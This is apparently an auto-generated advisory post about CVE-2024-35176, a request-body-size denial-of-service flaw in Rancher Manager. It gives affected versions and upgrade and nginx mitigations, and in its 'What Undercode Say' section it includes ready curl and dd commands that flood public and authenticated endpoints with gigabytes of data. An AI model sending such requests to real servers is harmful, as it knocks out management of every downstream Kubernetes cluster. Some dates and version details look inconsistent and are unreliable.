Rancher Manager, Request Body Size Limit DoS, CVE-2024-35176 (Critical)

By /

Listen to this Post

The vulnerability exists because Rancher Manager lacks a default maximum request body size limit on specific public (/v3-public/) and authenticated API endpoints. When a request is sent to a vulnerable endpoint, the entire body is read into the server’s memory without any size validation. An attacker can exploit this by crafting HTTP POST or PUT requests with extremely large payloads (e.g., several gigabytes). These oversized requests are fully buffered in memory upon processing. By repeatedly sending such requests, the attacker can cause the Rancher Manager’s memory usage to spike dramatically. This exhausts the available system memory, leading to a denial-of-service condition where the application becomes unresponsive or crashes, affecting all managed Kubernetes clusters.
Platform: Rancher Manager
Version: <2.9.12,<2.10.9,<2.11.5,<2.12.1
Vulnerability: DoS
Severity: Critical

date: 2024-08-28

Prediction: 2024-09-11

What Undercode Say:

Simulating a request to a vulnerable /v3-public endpoint
curl -X POST "https://<rancher-server>/v3-public/someEndpoint" -H "Content-Type: application/json" --data-binary @/dev/zero
Using a large file
dd if=/dev/zero of=large_payload.bin bs=1G count=10
curl -X PUT "https://<rancher-server>/v3/authenticated/endpoint" -H "Authorization: Bearer <token>" -H "Content-Type: application/octet-stream" --data-binary @large_payload.bin
Monitoring memory usage on the Rancher server during attack
watch -n 1 'ps -eo pid,comm,rss | grep rancher'

How Exploit:

An attacker sends oversized HTTP requests to unauthenticated `/v3-public/` or authenticated API endpoints, consuming all available memory on the Rancher Manager server, causing a complete DoS.

Protection from this CVE

Upgrade to Rancher Manager v2.12.1, v2.11.5, v2.10.9, or v2.9.12. For non-patched versions, configure a reverse proxy (e.g., nginx) to enforce client_max_body_size limits before requests reach the Rancher application.

Impact:

Memory exhaustion leads to a full denial-of-service, crashing Rancher Manager and disrupting management operations for all downstream Kubernetes clusters.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top